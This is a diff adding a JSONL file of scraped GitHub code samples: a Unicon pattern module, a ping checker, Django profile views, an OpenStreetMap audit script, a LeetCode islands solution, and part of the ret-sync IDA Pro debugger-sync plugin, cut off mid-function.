diff --git "a/3141.jsonl" "b/3141.jsonl" new file mode 100644--- /dev/null +++ "b/3141.jsonl" @@ -0,0 +1,811 @@ +{"seq_id":"74210550807","text":"'''\nUnicon Plugin Patterns\n----------------------\n\nPattern module in a Unicon plugin allows developers to consolidate all\nregex patterns that matches dialogs, statements & the likes into one location.\n\n'''\n\nlogin_prompt = r' *login here: *?'\nconfirm_imaginary = r' *press ENTER to confirm imaginary platform\\.\\.\\.'\n","repo_name":"CiscoDevNet/pyats-plugin-examples","sub_path":"unicon_plugin_example/src/unicon_plugin_example/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"70126766488","text":"import os, time, sys\n\n\ndef checkIPs(path):\n f = open(path)\n lines = f.readlines()\n start_time = int(time.time())\n count_success = 0\n count_fail = 0\n success = []\n\n for line in lines:\n ip = line.replace('\\n', '')\n result = os.system('ping -c1 -W1 %s'%ip)\n if result:\n print(\"ping %s is fail\" % (ip))\n count_false += 1\n else:\n\n print(\"ping %s is ok\" % (ip))\n count_success += 1\n success.append(ip)\n\n end_time = int(time.time())\n cost_time = end_time - start_time\n print(\"time(秒):\", cost_time,\"s\")\n print(\"ping通的ip数:\", count_success, \" ping不通的ip数:\", count_fail)\n print(\"可以使用的节点: \", \"\\033[32m%s\\r\\033[0m\" % success)\n\n return (cost_time, count_success, count_fail, success)\n\n\n","repo_name":"lforme/pingtest","sub_path":"checkss.py","file_name":"checkss.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"27221482661","text":"from django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.views import generic\nfrom wsgiref.util import FileWrapper\nfrom django.utils.encoding import smart_str\nimport mimetypes\nimport os\n\nfrom .models import Profile\nfrom .forms import EditProfileForm\nfrom .utils import get_or_create_profile\nfrom penndsg.settings import MEDIA_ROOT\n\n\n@login_required\ndef profile_detail_view(request):\n p = get_or_create_profile(request.user)\n context = {'profile': p}\n return render(request, 'profile/detail.html', context)\n\n\n@login_required\ndef edit_profile_view(request):\n p = get_or_create_profile(request.user)\n if request.method == 'POST':\n form = EditProfileForm(request.POST, request.FILES, instance=p)\n if form.is_valid():\n form.save()\n messages.add_message(\n request, messages.SUCCESS, 'Changes saved successfully'\n )\n return redirect('account:detail')\n else:\n messages.add_message(\n request, messages.ERROR, 'An error occurred'\n )\n return redirect('account:edit')\n else:\n form = EditProfileForm(instance=p)\n context = {'form': form}\n return render(request, 'profile/edit.html', context)\n\n\n@login_required\ndef download_resume(request):\n try:\n file_path = request.user.profile.resume.name\n except:\n raise Http404(\"No resume found.\")\n # https://stackoverflow.com/q/15246661/2680824\n file_name = os.path.basename(file_path)\n file_path = MEDIA_ROOT + '/' + file_path\n file_wrapper = FileWrapper(open(file_path,'rb'))\n file_mimetype = mimetypes.guess_type(file_path)\n response = HttpResponse(file_wrapper, content_type=file_mimetype )\n response['X-Sendfile'] = file_path\n response['Content-Length'] = os.stat(file_path).st_size\n response['Content-Disposition'] = (\n 'attachment; filename={}'.format(smart_str(file_name))\n )\n return response\n","repo_name":"benlindsay/pdsg-django","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70829710168","text":"import xml.etree.ElementTree as ET\r\nfrom collections import defaultdict\r\nimport pprint\r\nimport re\r\n\r\n############################################\r\n# 探索用户\r\n############################################\r\nBASIC_NODES = [\"relation\", \"node\", \"way\"]\r\n\r\ndef get_user(element):\r\n return element.get(\"uid\"), element.get(\"user\")\r\n\r\n#获取所有的用户-id对\r\ndef get_user_of_map(filename):\r\n users = set()\r\n for _, element in ET.iterparse(filename):\r\n if element.tag in BASIC_NODES:\r\n user_id, user_name = get_user(element)\r\n users.add(user_id + ':' + user_name)\r\n return users\r\n\r\nusers_set = get_user_of_map(OSM_FILE_NAME)\r\nprint(len(users_set))\r\nprint(users_set)\r\n\r\n###########################################\r\n# 街道名(课程内代码)\r\nOSM_FILE_NAME = \"map.xml\"\r\n#匹配街道名称最后独立字符串(称谓)\r\nstreet_type_re = re.compile(r'\\b\\S+\\.?$', re.IGNORECASE)\r\n\r\nexpected = [\"Street\", \"Avenue\", \"Boulevard\", \"Drive\", \"Court\", \"Place\", \"Square\", \"Lane\", \"Road\", \r\n \"Trail\", \"Parkway\", \"Commons\"]\r\n\r\n# UPDATE THIS VARIABLE\r\nmapping = { \"St\": \"Street\",\r\n \"St.\": \"Street\",\r\n \"Rd\": \"Road\",\r\n \"Rd.\": \"Road\",\r\n \"Ave\": \"Avenue\"\r\n }\r\ndef audit_street_type(street_types, street_name):\r\n m = re.search(street_type_re, street_name)\r\n if m:\r\n street_type = m.group()\r\n if street_type not in expected:\r\n street_types[street_type].add(street_name)\r\n\r\n\r\ndef is_street_name(elem):\r\n return (elem.attrib['k'] == \"addr:street\")\r\n\r\n\r\ndef audit(osmfile):\r\n osm_file = open(osmfile, \"r\")\r\n street_types = defaultdict(set)\r\n \r\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\r\n if elem.tag == \"node\" or elem.tag == \"way\":\r\n for tag in elem.iter(\"tag\"):\r\n if is_street_name(tag):\r\n audit_street_type(street_types, tag.attrib['v'])\r\n \r\n osm_file.close()\r\n return street_types\r\n\r\n\r\ndef update_name(name, mapping):\r\n for from_name, to_name in mapping.iteritems():\r\n #print '(.*)(' + from_name + ')$'\r\n name_regex = re.compile(r'(.*)(' + from_name + ')$', re.IGNORECASE)\r\n match_result = re.search(name_regex, name)\r\n\r\n if match_result:\r\n name = match_result.group(1) + to_name\r\n break;\r\n return name","repo_name":"jdzyh/DataAnalysis","sub_path":"Program/1.OpenStreetmap/UPDATE_CONTENT/audit_codes/discover_nodes.py","file_name":"discover_nodes.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31488863691","text":"from typing import List, Deque\nfrom collections import deque\n\nclass NumberOfIslands:\n \"\"\"\n 200. Number of Islands\n\n Given an m x n 2D binary grid grid which represents a map of '1's (land) and '0's (water), return the number of islands.\n\n An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. \n\n You may assume all four edges of the grid are all surrounded by water.\n \"\"\"\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\"\n Breadth first search\n\n O(n^2*v+e)\n\n # define a queue for traversal\n # define a set for visited nodes\n\n # loop over rows and cols\n # continue if row,col is in visited\n # if element == 1 add it to queue\n \n # if queue is not empty\n # while queue is not empty:\n # check all four directions, if any of them contains a '1' add them to the queue and visited\n \n # increment island count by 1\n \n # return island count\n\n Explanation: \n \n Whenever we find a '1', we try to do a BFS using it as the root node, by adding all elements that are equal to '1'\n\n that are adjacent vertically or horizontally, and each element we find we add it to visited nodes to avoid circular infinite loops\n\n https://leetcode.com/problems/number-of-islands/submissions/868721672/\n \"\"\"\n queue = deque() # type: Deque[str]\n visited = set()\n island_count = 0\n \n for row_index, row in enumerate(grid):\n for col_index, col in enumerate(row):\n if f'{row_index},{col_index}' in visited:\n continue\n \n if col == '1':\n queue.append(f'{row_index},{col_index}')\n visited.add(f'{row_index},{col_index}')\n \n if queue:\n while queue:\n traversal_row, traversal_col = map(int, queue.popleft().split(','))\n if traversal_row + 1 < len(grid) and grid[traversal_row+1][traversal_col] == '1' and f'{traversal_row+1},{traversal_col}' not in visited:\n queue.append(f'{traversal_row+1},{traversal_col}')\n visited.add(f'{traversal_row+1},{traversal_col}')\n\n if traversal_row - 1 >= 0 and grid[traversal_row-1][traversal_col] == '1' and f'{traversal_row-1},{traversal_col}' not in visited:\n queue.append(f'{traversal_row-1},{traversal_col}')\n visited.add(f'{traversal_row-1},{traversal_col}')\n\n if traversal_col - 1 >= 0 and grid[traversal_row][traversal_col-1] == '1' and f'{traversal_row},{traversal_col-1}' not in visited:\n queue.append(f'{traversal_row},{traversal_col-1}')\n visited.add(f'{traversal_row},{traversal_col-1}')\n\n if traversal_col + 1 < len(row) and grid[traversal_row][traversal_col+1] == '1' and f'{traversal_row},{traversal_col+1}' not in visited:\n queue.append(f'{traversal_row},{traversal_col+1}')\n visited.add(f'{traversal_row},{traversal_col+1}')\n \n island_count += 1\n \n return island_count\n\nif __name__ == '__main__':\n obj = NumberOfIslands()\n\n assert obj.numIslands([\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n ]) == 1\n\n assert obj.numIslands([\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"1\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"1\",\"1\"]\n ]) == 3","repo_name":"Abdul-fattah-Tayih/leetcode-submissions","sub_path":"solutions/number_of_islands.py","file_name":"number_of_islands.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73249079767","text":"import os\nimport re\nimport sys\nimport time\nimport traceback\nimport struct\nimport binascii\nimport base64\nimport socket\nimport json\nimport uuid\nimport argparse\n\nfrom retsync.syncrays import Syncrays\nimport retsync.rsconfig as rsconfig\nfrom retsync.rsconfig import rs_encode, rs_decode, rs_log, rs_debug, load_configuration\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import QProcess, QProcessEnvironment\n\nimport idc\nimport idaapi\nimport idautils\nimport ida_bytes\nimport ida_graph\nimport ida_range\nimport ida_funcs\nimport ida_name\nimport ida_hexrays\nimport ida_kernwin\nimport ida_idaapi\nimport ida_dbg\nimport ida_nalt\n\nfrom idaapi import PluginForm\n\n\n# get PYTHON_PATH settings, based on platform\nPYTHON_PATH = rsconfig.get_python_interpreter()\nos.environ['PYTHON_PATH'] = PYTHON_PATH\n\n# default value is current script's path\nBROKER_PATH = os.path.join(os.path.normpath(os.path.dirname(__file__)), rsconfig.PLUGIN_DIR, 'broker.py')\nif not os.path.exists(BROKER_PATH):\n rs_log(\"[-] broker path is not properly set, current value: <%s>\" % BROKER_PATH)\n raise RuntimeError\n\nos.environ['IDB_PATH'] = os.path.dirname(os.path.realpath(idaapi.get_path(idaapi.PATH_TYPE_IDB)))\n\nCOL_CBTRACE = rsconfig.COL_CBTRACE\n\n\n# --------------------------------------------------------------------------\n\n\nclass RequestHandler(object):\n\n # color callback\n def cb_color(self, ea):\n idaapi.set_item_color(ea, COL_CBTRACE)\n\n # instruction step callback\n def cb_curline(self, ea):\n if self.prev_loc:\n prev_ea, prev_color = self.prev_loc\n cur_color = idaapi.get_item_color(prev_ea)\n # race condition: block/instruction's color may have been modified\n # after it was saved\n if (cur_color != prev_color) and (cur_color != rsconfig.COL_CURLINE):\n prev_color = cur_color\n idaapi.set_item_color(prev_ea, prev_color)\n\n self.prev_loc = [ea, idaapi.get_item_color(ea)]\n idaapi.set_item_color(ea, rsconfig.COL_CURLINE)\n\n def cb_restore_last_line(self):\n if self.prev_loc:\n ea, col = self.prev_loc\n idaapi.set_item_color(ea, col)\n\n # support -a / --address switch\n def addr_switch(self, offset, msg):\n if (not msg) or (msg == ''):\n return [offset, msg]\n\n try:\n args = self.parser.parse_args(msg.split())\n except argparse.ArgumentError:\n rs_log('failed to parse command')\n return [None, msg]\n\n # no address switch supplied\n if not args.address:\n return [offset, msg]\n\n try:\n addr = int(''.join(args.address), 16)\n except (TypeError, ValueError):\n rs_log('failed to parse address, should be hex')\n return [None, msg]\n\n # make sure the address points to a valid instruction/data\n head = idaapi.get_item_head(addr)\n if head != addr:\n rs_log(\"ambiguous address, did you mean 0x%x ?\" % head)\n return [None, msg]\n\n return [addr, ' '.join(args.msg)]\n\n # check if address is within a valid segment\n def is_safe(self, offset):\n return not (idc.get_segm_start(offset) == ida_idaapi.BADADDR)\n\n # rebase (and update) address with respect to local image base\n def rebase(self, base, offset):\n if base is not None:\n # check for non-compliant debugger client\n if base > offset:\n rs_log('unsafe addr: 0x%x > 0x%x' % (base, offset))\n return None\n\n # update base address of remote module\n if self.base_remote != base:\n self.base_remote = base\n\n offset = self.rebase_local(offset)\n\n if not self.is_safe(offset):\n rs_log('unsafe addr: 0x%x not in valid segment' % (offset))\n return None\n\n return offset\n\n # rebase address with respect to local image base\n def rebase_local(self, offset):\n if not (self.base == self.base_remote):\n offset = (offset - self.base_remote) + self.base\n\n return offset\n\n # rebase address with respect to remote image base\n def rebase_remote(self, offset):\n if not (self.base == self.base_remote):\n offset = (offset - self.base) + self.base_remote\n\n return offset\n\n # demangle names\n def demangle(self, name):\n mask = idc.get_inf_attr(idc.INF_SHORT_DEMNAMES)\n demangled = idc.demangle_name(name, mask)\n if demangled is None:\n return name\n else:\n return demangled\n\n # prevent flooding debug engine with too much commands\n # sync plugin does NOT wait for any sort of ack\n # example: \"^ Debuggee already running error in 'g'\"\n def notice_anti_flood(self):\n time.sleep(0.1)\n\n # append comment and handle cmt's size limitation (near 1024)\n def append_cmt(self, ea, cmt, rptble=False):\n if len(cmt) > 1024:\n rs_log(\"warning, comment needs to be splitted (from 0x%x)\" % ea)\n nh = idaapi.next_head(ea, ida_idaapi.BADADDR)\n if nh == ida_idaapi.BADADDR:\n rs_log('[x] failed to find next instruction candidate')\n return\n\n self.append_cmt(nh, cmt[1024:], rptble)\n cmt = cmt[:1024]\n\n idaapi.append_cmt(ea, cmt, rptble)\n\n # location request, update disassembly IDA view\n def req_loc(self, hash):\n offset, base = hash['offset'], hash.get('base')\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n if self.color:\n self.cb_color(ea)\n\n idaapi.jumpto(ea)\n self.cb_curline(ea)\n self.gm.center()\n\n if self.hexsync.enabled:\n self.hexsync.cb_loc(ea)\n\n # set remote base on purpose\n def req_rbase(self, hash):\n rbase = hash['rbase']\n self.base_remote = rbase\n\n # log command output request at addr\n def req_cmd(self, hash):\n msg_b64, offset, base = hash['msg'], hash['offset'], hash['base']\n msg = rs_decode(base64.b64decode(msg_b64))\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n rs_log(\"cmd output added at 0x%x\" % ea)\n self.append_cmt(ea, str(msg))\n\n # reset comment at addr\n def req_rcmt(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n idaapi.set_cmt(ea, str(''), False)\n rs_log(\"reset comment at 0x%x\" % ea)\n\n # add comment request at addr\n def req_cmt(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n self.append_cmt(ea, str(msg))\n rs_log(\"comment added at 0x%x\" % ea)\n\n # add a function comment at addr\n def req_fcmt(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n func = idaapi.get_func(ea)\n if not func:\n rs_log(\"could not find func for 0x%x\" % ea)\n return\n\n idaapi.set_func_cmt(func, str(msg), False)\n rs_log(\"function comment added at 0x%x\" % ea)\n\n # add an address comment request at addr\n def req_raddr(self, hash):\n raddr, rbase, offset, base = hash['raddr'], hash['rbase'], hash['offset'], hash['base']\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n if self.base_remote != rbase:\n rs_log('could not rebase this address, 0x%x != 0x0, not in module')\n return\n\n addr = self.rebase(rbase, raddr)\n if not addr:\n return\n\n self.append_cmt(ea, \"0x%x (rebased from 0x%x)\" % (addr, raddr))\n rs_log(\"comment added at 0x%x\" % ea)\n\n # return current cursor in IDA Pro\n def req_cursor(self, hash):\n rs_log('request IDA Pro cursor position')\n addr = self.rebase_remote(idc.get_screen_ea())\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\"0x%x\\\"\" % addr)\n return\n\n # patch memory at specified address using info from debugger\n def req_patch(self, hash):\n addr, value, length = hash['addr'], hash['value'], hash['len']\n\n if length == 4:\n prev_value = idc.get_wide_dword(addr)\n if not ida_bytes.create_data(ea, FF_DWORD, 4, ida_idaapi.BADADDR):\n rs_log('[x] ida_bytes.create_data FF_DWORD failed')\n if not ida_bytes.patch_dword(addr, value):\n rs_log('[x] patch_dword failed')\n if not idc.op_plain_offset(addr, 0, 0):\n rs_log('[x] op_plain_offset failed')\n\n elif length == 8:\n prev_value = idc.get_qword(addr)\n if not ida_bytes.create_data(addr, FF_QWORD, 8, ida_idaapi.BADADDR):\n rs_log('[x] ida_bytes.create_data FF_QWORD failed')\n if not ida_bytes.patch_qword(addr, value):\n rs_log('[x] patch_qword failed')\n if not idc.op_plain_offset(addr, 0, 0):\n rs_log('[x] op_plain_offset failed')\n\n else:\n rs_log(\"[x] unsupported length: %d\" % length)\n return\n\n rs_log(\"patched 0x%x = 0x%x (previous was 0x%x)\" % (addr, value, prev_value))\n\n # return idb's symbol for a given address\n def req_rln(self, hash):\n raddr = hash['raddr']\n\n rs_debug(\"rln: 0x%x\" % raddr)\n\n addr = self.rebase_local(raddr)\n if not addr:\n rs_log(\"could not rebase this address (0x%x)\" % raddr)\n return\n\n sym = idaapi.get_func_name(addr)\n if sym:\n sym = self.demangle(sym)\n func = idaapi.get_func(addr)\n if not func:\n rs_log(\"could not find func for 0x%x\" % addr)\n return\n\n lck = idaapi.lock_func(func)\n limits = ida_range.range_t()\n rs = ida_range.rangeset_t()\n\n if ida_funcs.get_func_ranges(rs, func) != ida_idaapi.BADADDR:\n limits.start_ea = rs.begin().start_ea\n limits.end_ea = rs.begin().end_ea\n\n if limits.start_ea != addr:\n if (addr > limits.start_ea):\n sym = \"%s%s0x%x\" % (sym, \"+\", addr - limits.start_ea)\n else:\n sym = \"%s%s0x%x\" % (sym, \"-\", limits.start_ea - addr)\n lck = None\n else:\n sym = idc.get_name(addr, ida_name.GN_VISIBLE)\n if sym:\n sym = self.demangle(sym)\n\n if sym:\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\"%s\\\"\" % sym)\n rs_debug(\"resolved symbol: %s\" % sym)\n else:\n rs_log(\"could not resolve symbol for address 0x%x\" % addr)\n\n # return address for a given idb's symbol\n def req_rrln(self, hash):\n sym = hash['sym']\n rs_log(\"rrln> symbol \\\"%s\\\"\" % sym)\n\n addr = idc.get_name_ea_simple(str(sym))\n if addr:\n raddr = self.rebase_remote(addr)\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % raddr)\n rs_log(\"rrln> remote: 0x%x, local: 0x%x)\" % (raddr, addr))\n else:\n rs_log(\"rrln> symbol not found \\\"%s\\\"\" % sym)\n\n # add label request at addr\n def req_lbl(self, hash):\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n offset, msg = self.addr_switch(offset, msg)\n if not offset:\n return\n\n ea = self.rebase(base, offset)\n if not ea:\n return\n\n flags = False\n if str(msg).startswith('@@'):\n flags = idaapi.SN_LOCAL\n\n idaapi.set_name(ea, str(msg), flags)\n rs_log(\"label added at 0x%x\" % ea)\n\n # color request at addr\n def req_bc(self, hash):\n global COL_CBTRACE\n msg, offset, base = hash['msg'], hash['offset'], hash['base']\n\n if self.is_active:\n ea = self.rebase(base, offset)\n if not ea:\n return\n else:\n ea = self.base\n\n if (msg == 'oneshot'):\n rs_log(\"color oneshot added at 0x%x\" % ea)\n # mark address as being colored\n self.prev_loc = [ea, COL_CBTRACE]\n elif (msg == 'on'):\n rs_log(\"color start from 0x%x\" % ea)\n self.color = True\n self.prev_loc = [ea, COL_CBTRACE]\n elif (msg == 'off'):\n rs_log(\"color end at 0x%x\" % ea)\n self.color = False\n elif (msg == 'set'):\n new_col = hash['rgb']\n if new_col > 0xffffff:\n rs_log('restoring color')\n new_col = rsconfig.COL_GREEN\n\n COL_CBTRACE = new_col\n rs_log(\"set color to 0x%x\" % COL_CBTRACE)\n else:\n rs_log(\"invalid color request (%s)\" % msg)\n\n # reload .bpcmds from idb\n def req_bps_get(self, hash):\n rs_log('[-] reload .bpcmds')\n node = idaapi.netnode(rsconfig.NETNODE_INDEX)\n if not node:\n rs_log('[-] failed to open netnode store')\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"no blob\\\"\")\n return\n\n node.create(rsconfig.NETNODE_STORE)\n blob = rs_decode(node.getblob(0, str(chr(1))))\n\n if not blob:\n rs_log(' -> no blob')\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\" -> reloading .bpcmds: no blob\\\"\")\n return\n\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\"%s\\\"\" % blob)\n return\n\n # save .bpcmds to idb\n def req_bps_set(self, hash):\n blob = hash['msg']\n rs_log('[-] save .bpcmds')\n node = idaapi.netnode(rsconfig.NETNODE_INDEX)\n if not node:\n rs_log('[-] failed to open netnode store')\n self.notice_broker('cmd', \"\\\"cmd\\\":\\\" -> failed to save .bpcmds\")\n return\n\n new = node.create(rsconfig.NETNODE_STORE)\n if new == 0:\n rs_log(' -> creating new netnode store')\n\n out = node.setblob(rs_encode(blob), 0, chr(1))\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\" -> .bpcmds saved\\\"\")\n return\n\n # compare loaded module md5 with idb's input file md5\n def req_modcheck(self, hash):\n md5, pdb = hash.get('md5'), hash.get('pdb')\n remote = None\n\n if md5:\n rs_log(\"modcheck idb (md5)\")\n local = rs_decode(binascii.hexlify(idaapi.retrieve_input_file_md5())).upper()\n remote = (''.join(md5.split())).upper()\n elif pdb:\n rs_log(\"modcheck idb (pdb guid)\")\n msg = rs_decode(base64.b64decode(pdb))\n local = DbgDirHlpr.read_rsds_guid()\n remote = DbgDirHlpr.parse_itoldyouso_output(msg)\n\n rs_log(\" -> remote: <%s>\" % remote)\n rs_log(\" -> local : <%s>\" % local)\n\n if remote == '0':\n output = '[!] warning, no Debug Directory'\n elif local == remote:\n output = '[+] module successfully matched'\n else:\n output = '[!] warning, modules mismatch'\n\n rs_log(output)\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % output)\n return\n\n # specify debugger dialect used to send commands\n def req_set_dbg_dialect(self, hash):\n global SyncForm\n dialect = hash['dialect']\n if dialect in rsconfig.DBG_DIALECTS:\n self.dbg_dialect = rsconfig.DBG_DIALECTS[dialect]\n rs_log(\"set debugger dialect to %s, enabling hotkeys\" % dialect)\n SyncForm.init_hotkeys()\n else:\n SyncForm.uninit_hotkeys()\n\n # request from broker\n def req_broker(self, hash):\n subtype = hash['subtype']\n\n if (subtype == 'msg'):\n # simple message announcement\n rs_log(\"<< broker << %s\" % hash['msg'])\n\n elif(subtype == 'notice'):\n # notice from broker\n self.broker_port = int(hash['port'])\n rs_debug(\"<< broker << binding on port %d\" % self.broker_port)\n\n for attempt in range(rsconfig.CONNECT_BROKER_MAX_ATTEMPT):\n try:\n host = socket.gethostbyname('localhost')\n self.broker_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.broker_sock.settimeout(2)\n self.broker_sock.connect((host, self.broker_port))\n break\n except socket.error:\n rs_log('failed to connect to broker')\n rs_log(sys.exc_info())\n if self.broker_sock:\n self.broker_sock.close()\n self.broker_sock = None\n time.sleep(0.1)\n if (attempt == (rsconfig.CONNECT_BROKER_MAX_ATTEMPT - 1)):\n self.announcement(\"[sync] failed to connect to broker (attempt %d)\" % attempt)\n raise RuntimeError\n\n # request broker to validate its beacon\n time.sleep(0.4)\n self.beacon_notice()\n\n # enable/disable idb, if disable it drops most sync requests\n elif(subtype == 'enable_idb'):\n self.is_active = True\n rs_log('idb is enabled')\n\n elif(subtype == 'disable_idb'):\n self.is_active = False\n self.base_remote = None\n self.cb_restore_last_line()\n rs_log('idb is disabled')\n\n # parse and execute request\n # Note that sometimes we don't receive the whole request from the broker.py\n # so parsing fails. One way for fixing this would be to fix broker.py to get\n # everything until \"\\n\" before proxying it but the way we do here is to read\n # everything until \"}\" is received (end of json)\n def parse_exec(self, req):\n if self.prev_req:\n if self.prev_req != \"\":\n if rsconfig.DEBUG_JSON:\n rs_log(\"JSON merge with request: \\\"%s\\\"\" % req)\n\n req = self.prev_req + req\n self.prev_req = \"\"\n if req == '':\n return\n if rsconfig.DEBUG_JSON:\n rs_log(\"parse_exec -> \" + str(req))\n\n if not (req.startswith('[sync]')):\n rs_log(\"[<] bad hdr %s\" % repr(req))\n rs_log('[-] Request dropped due to bad header')\n return\n\n req_ = self.normalize(req, 6)\n\n try:\n hash = json.loads(req_)\n except ValueError:\n if rsconfig.DEBUG_JSON:\n rs_log(\"[x] Sync failed to parse json\\n '%s'. Caching for next req...\" % req_)\n rs_log(\"------------------------------------\")\n self.prev_req = req\n return\n\n rtype = hash['type']\n if rtype not in self.req_handlers:\n rs_log(\"unknown request: %s\" % rtype)\n return\n\n req_handler = self.req_handlers[rtype]\n\n # few requests are handled even though idb is not enable\n if rtype in ['broker', 'dialect', 'bc']:\n req_handler(hash)\n else:\n if self.is_active:\n req_handler(hash)\n else:\n rs_debug(\"[-] Drop the %s request because idb is not enabled\" % rtype)\n return\n\n idaapi.refresh_idaview_anyway()\n\n def normalize(self, req, taglen):\n req = req[taglen:]\n req = req.replace(\"\\\\\", \"\\\\\\\\\")\n req = req.replace(\"\\n\", \"\")\n return req.strip()\n\n # send a kill notice to the broker (then forwarded to the dispatcher)\n def kill_notice(self):\n self.notice_broker(\"kill\")\n\n # send a beacon notice to the broker\n def beacon_notice(self):\n self.notice_broker('beacon')\n\n # send a bp command (F2) to the debugger (via the broker and dispatcher)\n def bp_notice(self, oneshot=False):\n if not self.is_active:\n rs_log(\"idb isn't enabled, bp can't be set\")\n return\n\n ea = idaapi.get_screen_ea()\n offset = self.rebase_remote(ea)\n cmd = \"%s0x%x\" % (self.dbg_dialect['bp1' if oneshot else 'bp'], offset)\n\n if (oneshot and 'oneshot_post' in self.dbg_dialect):\n cmd += self.dbg_dialect['oneshot_post']\n\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_log(\">> set %s\" % cmd)\n\n # send a hardware bp command (Ctrl-F2) to the debugger (via the broker and dispatcher)\n def hbp_notice(self, oneshot=False):\n if not self.is_active:\n rs_log(\"idb isn't enabled, hbp can't be set\")\n return\n\n ea = idaapi.get_screen_ea()\n offset = self.rebase_remote(ea)\n cmd = \"%s0x%x\" % (self.dbg_dialect['hbp1' if oneshot else 'hbp'], offset)\n\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_log(\">> set %s\" % cmd)\n\n # send a oneshot bp command (F3) to the debugger (via the broker and dispatcher)\n def bp_oneshot_notice(self):\n self.bp_notice(True)\n\n # send a oneshot hardware bp command (Ctrl-F3) to the debugger (via the broker and dispatcher)\n def hbp_oneshot_notice(self):\n self.hbp_notice(True)\n\n # export IDB's breakpoint (Ctrl-F1) to the debugger (via the broker and dispatcher)\n def export_bp_notice(self):\n if not self.dbg_dialect:\n rs_log(\"idb isn't synced yet, can't export bp\")\n return\n\n is_windbg = (self.dbg_dialect == 'windbg')\n\n # Windbg supports relative address, ie. mod+0xCAFE\n # for non relative address the remote base address is needed\n if (not is_windbg) and (not self.base_remote):\n rs_log(\"idb isn't enabled, can't export bp\")\n return\n\n mod = self.name.split('.')[0].strip()\n nbp = ida_dbg.get_bpt_qty()\n\n for i in range(nbp):\n ea = idc.get_bpt_ea(i)\n attrs = [idc.BPTATTR_TYPE, idc.BPTATTR_COND, idc.BPTATTR_FLAGS]\n btype, cond, flags = [idc.get_bpt_attr(ea, x) for x in attrs]\n\n if cond:\n rs_log(\"bp %d: conditional bp not supported\" % i)\n else:\n if ((btype in [idc.BPT_EXEC, idc.BPT_SOFT]) and\n ((flags & idc.BPT_ENABLED) != 0)):\n\n bp = self.dbg_dialect['hbp' if (btype == idc.BPT_EXEC) else 'bp']\n\n if is_windbg:\n offset = ea - self.base\n cmd = \"%s%s+0x%x\" % (bp, mod, offset)\n else:\n offset = self.rebase_remote(ea)\n cmd = \"%s0x%x\" % (bp, offset)\n\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_log(\"bp %d: %s\" % (i, cmd))\n\n rs_log('export done')\n\n # send a translate command (Alt-F2) to the debugger (via the broker and dispatcher)\n def translate_notice(self):\n if not self.dbg_dialect:\n rs_log(\"idb isn't synced yet, can't translate\")\n return\n\n ea = idaapi.get_screen_ea()\n mod = self.name.split('.')[0].strip()\n cmd = self.dbg_dialect['prefix'] + \"translate 0x%x 0x%x %s\" % (self.base, ea, mod)\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % cmd)\n rs_debug(\"translate address 0x%x\" % ea)\n\n # send a command to the debugger (via the broker and dispatcher)\n def cmd_notice(self, cmd, descr):\n if cmd in self.dbg_dialect:\n self.notice_broker(\"cmd\", \"\\\"cmd\\\":\\\"%s\\\"\" % self.dbg_dialect[cmd])\n self.notice_anti_flood()\n else:\n rs_log(\"the \\\"%s\\\" command is not available for the current debugger\" % cmd)\n\n # send a go command (Alt-F5) to the debugger (via the broker and dispatcher)\n def go_notice(self):\n 